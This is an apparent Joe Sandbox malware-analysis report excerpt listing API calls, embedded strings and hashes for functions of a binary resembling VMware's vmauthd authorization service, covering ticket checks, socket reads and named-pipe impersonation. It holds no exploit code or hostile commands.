                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastWarning$ServiceStatus
                                                    • String ID: Service Continuing.$Service Paused.$Service Stopped.$Service being interrogated....$SetServiceStatus failed (error %d).$SetServiceStatus failed while stopping(error %d).$Unknown service opcode %d
                                                    • API String ID: 4115867675-2117255868
                                                    • Opcode ID: 9de5b6f713cb61f100e2fcfe783f0f490322a98fe8daadf74e754e54e8a1c995
                                                    • Instruction ID: 717885a5b9c318273bd9efccda8e9fd16a1b88d8727f4cb0772a1faad3d51e7a
                                                    • Opcode Fuzzy Hash: 9de5b6f713cb61f100e2fcfe783f0f490322a98fe8daadf74e754e54e8a1c995
                                                    • Instruction Fuzzy Hash: 95419AB1142388DFD7102B62FD4AB593BA5FB24B45F04A067F619B42A0C37559C9EB22
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,00000001,?,00000000,00ED13A6), ref: 00ED377C
                                                    • WSAGetLastError.WS2_32(?,00000000,00ED13A6,?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED3787
                                                    • WaitForSingleObject.KERNEL32(?,?,?,00000000,00ED13A6), ref: 00ED37A8
                                                    • Warning.VMWAREBASE(?,?,UTF-8,?,00000000,00ED13A6), ref: 00ED38A0
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                      • Part of subcall function 00ED2780: Warning.VMWAREBASE(?,000000FF,00000000,00000000,?,00ED38C9,Data not in UTF-8 format,?,00000003,Line is not in UTF-8. Disconnecting,?,00000000,00ED13A6), ref: 00ED278B
                                                      • Part of subcall function 00ED2780: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000005,Data dump: %s,00000000,00000005,%s,00000003,?,000000FF,00000000,00000000,?,00ED38C9,Data not in UTF-8 format,?,00000003), ref: 00ED27AF
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED38FC
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED3919
                                                    Strings
                                                    • Data not in UTF-8 format, xrefs: 00ED38BF
                                                    • VMAuthdSocketRead, xrefs: 00ED38DD, 00ED3972
                                                    • Short response (%d). Disconnecting., xrefs: 00ED3831
                                                    • UTF-8, xrefs: 00ED3899
                                                    • Line missing \r, xrefs: 00ED3872
                                                    • Line is not in UTF-8. Disconnecting, xrefs: 00ED38B0
                                                    • recv timed-out waiting for data on connection. aborting., xrefs: 00ED37FB
                                                    • Input not in UTF-8 encoding., xrefs: 00ED38C9
                                                    • Overflowed buffer, xrefs: 00ED37E7
                                                    • Buffer full. Disconnecting., xrefs: 00ED37D8
                                                    • %s(): reading from closed socket., xrefs: 00ED3977
                                                    • Read a \n without a corresponding \r. Disconnecting., xrefs: 00ED385F
                                                    • recv() FAIL: %d., xrefs: 00ED3810
                                                    • %s: read failed. Closing socket for reading., xrefs: 00ED38E2
                                                    • Input too large., xrefs: 00ED37F1
                                                    • Input incorrectly terminated., xrefs: 00ED3840
                                                    • Input incorrectly terminated., xrefs: 00ED387C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CloseHandleObjectSingleWait_printffree
                                                    • String ID: %s(): reading from closed socket.$%s: read failed. Closing socket for reading.$Buffer full. Disconnecting.$Data not in UTF-8 format$Input incorrectly terminated.$Input incorrectly terminated.$Input not in UTF-8 encoding.$Input too large.$Line is not in UTF-8. Disconnecting$Line missing \r$Overflowed buffer$Read a \n without a corresponding \r. Disconnecting.$Short response (%d). Disconnecting.$UTF-8$VMAuthdSocketRead$recv timed-out waiting for data on connection. aborting.$recv() FAIL: %d.
                                                    • API String ID: 974896413-2831141954
                                                    • Opcode ID: fe1bb71848d3b0042995f73844586e5da9a1cad8413528f96198b9123856bb8a
                                                    • Instruction ID: f9d47f0633cd03f04320d310aae24c7a3d1e912215b92cc80ddfab7eb704d11b
                                                    • Opcode Fuzzy Hash: fe1bb71848d3b0042995f73844586e5da9a1cad8413528f96198b9123856bb8a
                                                    • Instruction Fuzzy Hash: 6B615A74A00304AADB24AB749C02BAAB7A1DF10714F00215FF565B63C2E7B15B0797A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ImpersonateNamedPipeClient.ADVAPI32(?), ref: 00ED3C9F
                                                    • GetLastError.KERNEL32 ref: 00ED3CA9
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED3CB0
                                                    • Warning.VMWAREBASE(?,?,ImpersonateNamePipeClient failed: %s (%d) ,00000000,00000000), ref: 00ED3CBF
                                                    • memset.VCRUNTIME140(?,00000000,00000400), ref: 00ED3CDA
                                                    • Warning.VMWAREBASE(?,?,?,00000000,00000400), ref: 00ED3CF7
                                                    • GetLastError.KERNEL32 ref: 00ED3D03
                                                    • Warning.VMWAREBASE(Failed to obtain username: %d,00000000), ref: 00ED3D0F
                                                    • GetCurrentThread.KERNEL32 ref: 00ED3D38
                                                    • OpenThreadToken.ADVAPI32(00000000), ref: 00ED3D3F
                                                    • GetLastError.KERNEL32 ref: 00ED3D49
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED3D50
                                                    • Warning.VMWAREBASE(?,?,DuplicateTokenEx failed: %s (%d) ,00000000,00000000), ref: 00ED3D95
                                                    • CloseHandle.KERNEL32(FFFFFFFF), ref: 00ED3DAF
                                                    Strings
                                                    • ImpersonateNamePipeClient failed: %s (%d) , xrefs: 00ED3CB6
                                                    • Username associated with named pipe: %s, xrefs: 00ED3D1D
                                                    • DuplicateTokenEx failed: %s (%d) , xrefs: 00ED3D8C
                                                    • OpenThreadToken failed: %s (%d) , xrefs: 00ED3D56
                                                    • Failed to obtain username: %d, xrefs: 00ED3D0A
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$Thread$ClientCloseCurrentHandleImpersonateNamedOpenPipeTokenmemset
                                                    • String ID: DuplicateTokenEx failed: %s (%d) $Failed to obtain username: %d$ImpersonateNamePipeClient failed: %s (%d) $OpenThreadToken failed: %s (%d) $Username associated with named pipe: %s
                                                    • API String ID: 3019834010-2777213736
                                                    • Opcode ID: 1b105f05341b526ffe18d6e9d4a98411b3a838c2b0609edc4384f4a9febeb2c0
                                                    • Instruction ID: 92d5cc78b987f3ea2681c838c1c26f2fe090e2b8a1403358c18f9bdc4a8d06cd
                                                    • Opcode Fuzzy Hash: 1b105f05341b526ffe18d6e9d4a98411b3a838c2b0609edc4384f4a9febeb2c0
                                                    • Instruction Fuzzy Hash: 0D3186F1501208AFDB20AB70AD4AFAA73ADEF04304F0455A7B714F2291D7709B468F66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,InSeCuRe), ref: 00ED1499
                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 00ED14B5
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$memset
                                                    • String ID: InSeCuRe$LOGIN FAILURE from %.128s, %s$Login incorrect.$Login with USER first.$No ticket found$Password not understood.$Ticket does not specify a cfgFile$Ticket does not specify a socketName$Ticket found: cfg=%s socket=%s$User %s logged in.$VUUU
                                                    • API String ID: 3890564892-1759344295
                                                    • Opcode ID: 1bf1c17757d6859354b42bf765ecc6633067ef53e8f08170db0489e0e923b99b
                                                    • Instruction ID: 203d055018b0557eadfa20942ee44929aa9fe56ccc26ad56be5d4039228fc0f3
                                                    • Opcode Fuzzy Hash: 1bf1c17757d6859354b42bf765ecc6633067ef53e8f08170db0489e0e923b99b
                                                    • Instruction Fuzzy Hash: 3D812A71A00205ABCB20DF64EC42BAA77E5DB45304F0451F7ED0AFB382EA358A4AC791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?,00000000,?), ref: 00ED40B9
                                                    • Warning.VMWAREBASE(00000001,?), ref: 00ED40C4
                                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00ED40DA
                                                    • IsValidSid.ADVAPI32(00000000), ref: 00ED40F1
                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00ED4108
                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00ED411F
                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00ED413B
                                                    • Warning.VMWAREBASE(00000001,?), ref: 00ED4146
                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 00ED415D
                                                    • IsValidSid.ADVAPI32(00000000), ref: 00ED4171
                                                    • EqualSid.ADVAPI32(?,?), ref: 00ED4185
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED4194
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED419D
                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00ED41B4
                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00ED41CB
                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00ED41E9
                                                    • Warning.VMWAREBASE(00000001,00000000), ref: 00ED41F4
                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00ED420B
                                                    • IsValidSid.ADVAPI32(00000000), ref: 00ED421B
                                                    • EqualSid.ADVAPI32(?,?), ref: 00ED422B
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED423F
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED4250
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED4257
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED425E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Token$Information$CloseHandleOpenProcess$ValidWarning$Equalfree
                                                    • String ID:
                                                    • API String ID: 802510982-0
                                                    • Opcode ID: 55405b6cca281aff1248c56213d60feb079af7238b63d0131deb2fae94a49554
                                                    • Instruction ID: 2c12c7346d4c1e98334d39b2f89890551f1cbca3ed5e0777901a615f20c0fd1f
                                                    • Opcode Fuzzy Hash: 55405b6cca281aff1248c56213d60feb079af7238b63d0131deb2fae94a49554
                                                    • Instruction Fuzzy Hash: DC514E71A01209BFDB119FA1EC49FDE7BB9EF15701F084066FA00F22A0D7719A49DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(received %s command: %s,?,?), ref: 00ED1A5E
                                                    • Warning.VMWAREBASE(?,?,00EDA6D8), ref: 00ED1A7A
                                                    • Warning.VMWAREBASE(00000000,?), ref: 00ED1A93
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004), ref: 00ED1AD1
                                                    • Warning.VMWAREBASE(00000025,?,?,00000000), ref: 00ED1B10
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1B30
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00000000), ref: 00ED1B78
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1C58
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1C6D
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1C95
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1C9C
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1CAB
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED1CC1
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED1CD6
                                                    Strings
                                                    • Invalid arguments to '%s%s', xrefs: 00ED1C7C
                                                    • Command '%s' not authorized to access the specific VM socket, xrefs: 00ED1C13
                                                    • bora\apps\vmauthd\vmauthd.c, xrefs: 00ED1D02
                                                    • received %s command: %s, xrefs: 00ED1A3E
                                                    • MEM_ALLOC %s:%d, xrefs: 00ED1D07
                                                    • Command '%s' not authorized for specified VM, xrefs: 00ED1BBC
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: free$Warning$calloc
                                                    • String ID: Command '%s' not authorized for specified VM$Command '%s' not authorized to access the specific VM socket$Invalid arguments to '%s%s'$MEM_ALLOC %s:%d$bora\apps\vmauthd\vmauthd.c$received %s command: %s
                                                    • API String ID: 153094251-2774384987
                                                    • Opcode ID: 512c4a9f5e4a7af5ee3a92f6e71452ba937b91b69439aa8b158d5b06e5b82611
                                                    • Instruction ID: 9385491c047609256c62b3f66c9bf8bfc563c5dbadf1459c0c68a8f1acc6262f
                                                    • Opcode Fuzzy Hash: 512c4a9f5e4a7af5ee3a92f6e71452ba937b91b69439aa8b158d5b06e5b82611
                                                    • Instruction Fuzzy Hash: 1C918371A00215ABDF149FA4DD85BFEBBB5EF05304F0810ABE905B7342D7369A16CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00ED81C0: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 00ED81DE
                                                      • Part of subcall function 00ED81C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,00000000,?,?,?,?,00000000), ref: 00ED820D
                                                    • Warning.VMWAREBASE([Ticket] Ticket is too short. Actual %Iu, expected at least %d,?,00000010,?,00000000), ref: 00ED7F39
                                                    • Warning.VMWAREBASE([Ticket] Ticket too long.,?,00000000), ref: 00ED7F64
                                                    • Warning.VMWAREBASE(?,?,?,00000000), ref: 00ED7FC1
                                                    • Warning.VMWAREBASE(?,00000000,00000001,00000000,?,?,?,00000000), ref: 00ED7FD2
                                                    • Warning.VMWAREBASE([Ticket] Ticket not found: %s,00000000,?,?,?,?,?,?,?,00000000), ref: 00ED7FE4
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,[Ticket] Ticket not found: %s,00000000,?,?,?,?,?,?,?,00000000), ref: 00ED7FEA
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 00ED8014
                                                    • Warning.VMWAREBASE(?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED803B
                                                    • Warning.VMWAREBASE([Ticket] Invalid ticket.,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED815A
                                                    • Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED8169
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$_time64
                                                    • String ID: VERIFY %s:%d$[Ticket] Invalid ticket - too long.$[Ticket] Invalid ticket.$[Ticket] Ticket is too short. Actual %Iu, expected at least %d$[Ticket] Ticket not found: %s$[Ticket] Ticket too long.$bora\lib\ticket\ticket.c$config file name$service name
                                                    • API String ID: 1808753558-2483994901
                                                    • Opcode ID: 5724413f7329f52f73b58e0a8d5279b5c2489f8ad6dd602e3e5d91c21e1f43c0
                                                    • Instruction ID: 11fd8bf64aa3c884f6803388c9d94ed21af91f09478fb5c2b932e5ad686ebbaa
                                                    • Opcode Fuzzy Hash: 5724413f7329f52f73b58e0a8d5279b5c2489f8ad6dd602e3e5d91c21e1f43c0
                                                    • Instruction Fuzzy Hash: DD714B719041185BDF20AF248E42BEEB7B5DB05314F4421D7E999B7382DA31DE4BCBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(00EE1098,?,?,00000000), ref: 00ED7745
                                                    • LeaveCriticalSection.KERNEL32(00EE1098), ref: 00ED7778
                                                    • Warning.VMWAREBASE(?,00000000,?,?,?,00000000), ref: 00ED77E0
                                                    • Warning.VMWAREBASE(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00ED7801
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00ED7810
                                                    • Warning.VMWAREBASE(Access denied opening securable object %s.,?,?,?,?,?,?,?,00000000), ref: 00ED7823
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,00000000), ref: 00ED7840
                                                    • Warning.VMWAREBASE(Failed to open securable object. Error %d opening "%s": %s,00000000,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00ED784D
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00000000), ref: 00ED7869
                                                    • DuplicateHandle.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000002,?,?,?,?,?,?,00000000), ref: 00ED787F
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00ED7889
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,?,00000000), ref: 00ED7892
                                                    • Warning.VMWAREBASE(Failed to duplicate handle: %d "%s": %s,00000000,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00ED789F
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00ED78AF
                                                    Strings
                                                    • Failed to open securable object. Error %d opening "%s": %s, xrefs: 00ED7848
                                                    • Request by process %d to open '%s': unrecognized pid, xrefs: 00ED7790
                                                    • Failed to duplicate handle: %d "%s": %s, xrefs: 00ED789A
                                                    • Access denied opening securable object %s., xrefs: 00ED781E
                                                    • Request by process %d to open '%s': invalid session info, xrefs: 00ED78CD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CriticalErrorHandleLastSection$CloseCurrentDuplicateEnterLeaveProcess
                                                    • String ID: Access denied opening securable object %s.$Failed to duplicate handle: %d "%s": %s$Failed to open securable object. Error %d opening "%s": %s$Request by process %d to open '%s': invalid session info$Request by process %d to open '%s': unrecognized pid
                                                    • API String ID: 3997251235-2006052915
                                                    • Opcode ID: e5da4ec70e8b5633c267d5e5706a1546c4263163eb69ad8547c949758ff9228a
                                                    • Instruction ID: f10baaccc1c523aca7afd5ff56d568969cf572fe9a6bb9b6698964d3908875f6
                                                    • Opcode Fuzzy Hash: e5da4ec70e8b5633c267d5e5706a1546c4263163eb69ad8547c949758ff9228a
                                                    • Instruction Fuzzy Hash: 56510475A04209AFCB10DFA8DC45AEEB7B6EF48324F14166BF959B3381E7305942C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000008,?,00000000,00000000), ref: 00ED6C0D
                                                    • GetCurrentProcess.KERNEL32 ref: 00ED6C20
                                                    • GetCurrentProcess.KERNEL32 ref: 00ED6C28
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000002), ref: 00ED6C3D
                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 00ED6C9C
                                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED6CD1
                                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED6CFC
                                                    • Warning.VMWAREBASE(Unable to grow map to %d elements,00000000), ref: 00ED6D47
                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00ED6D8E
                                                    • GetLastError.KERNEL32 ref: 00ED6DAE
                                                    • Warning.VMWAREBASE ref: 00ED6DB6
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED6DDA
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED6DEB
                                                    Strings
                                                    • Unable to grow map to %d elements, xrefs: 00ED6D42
                                                    • ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d), xrefs: 00ED6DBD
                                                    • bora\apps\vmauthd\authdServiceDesktop.cpp, xrefs: 00ED6E07
                                                    • NOT_IMPLEMENTED %s:%d, xrefs: 00ED6E0C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalCurrentHandleProcessSectionWarningrealloc$CloseDuplicateEnterErrorLastLeavecallocfree
                                                    • String ID: NOT_IMPLEMENTED %s:%d$ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d)$Unable to grow map to %d elements$bora\apps\vmauthd\authdServiceDesktop.cpp
                                                    • API String ID: 793435597-2097563929
                                                    • Opcode ID: 73ec2dda6691fdb6b4f0d07abbb292fe09ee511a7cebbf1275f66b891996b844
                                                    • Instruction ID: 0ca45fde5aadaa0f980d169ee8bddc262d4971332491a171936092d3b467e4c7
                                                    • Opcode Fuzzy Hash: 73ec2dda6691fdb6b4f0d07abbb292fe09ee511a7cebbf1275f66b891996b844
                                                    • Instruction Fuzzy Hash: 7051F278A01289AFCB14EF65EC95A7E77B6EB05354F04056AF901FB3A0DB30C989CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED62E9
                                                    • Warning.VMWAREBASE(00000010,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED62F5
                                                    • Warning.VMWAREBASE(?,00000010,?,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED630F
                                                    • Warning.VMWAREBASE(00000018,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9), ref: 00ED6331
                                                    • Warning.VMWAREBASE(?,00000018,?,?,?,?,?,?,00000000), ref: 00ED6339
                                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00000018,?,?,?,?,?,?,00000000), ref: 00ED6349
                                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED637D
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED63FF
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED6408
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED640F
                                                    • InitializeCriticalSection.KERNEL32(?,00000000,NOT_IMPLEMENTED %s:%d,bora\apps\vmauthd\localConnectToken.cpp,00000105,NOT_IMPLEMENTED %s:%d,bora\apps\vmauthd\localConnectToken.cpp,00000102,?,?,00000000), ref: 00ED6484
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED648E
                                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,?,00000004,?,?,00000000,?,?,?,?,?,?,?,00ED4EF9,?), ref: 00ED649B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$_time64calloc$CloseCriticalHandleInitializeSection
                                                    • String ID: Expiring local connect token!$NOT_IMPLEMENTED %s:%d$bora\apps\vmauthd\localConnectToken.cpp
                                                    • API String ID: 1245594273-4287543833
                                                    • Opcode ID: 63d62d2bf160ea885ba62063a6d9cc1f33adf31e6635db80e7ad8c8c0bf20e97
                                                    • Instruction ID: fd7da86770413ae1cfa004f64490fca83296dfe4e0d838e77a36647dafe4b3d1
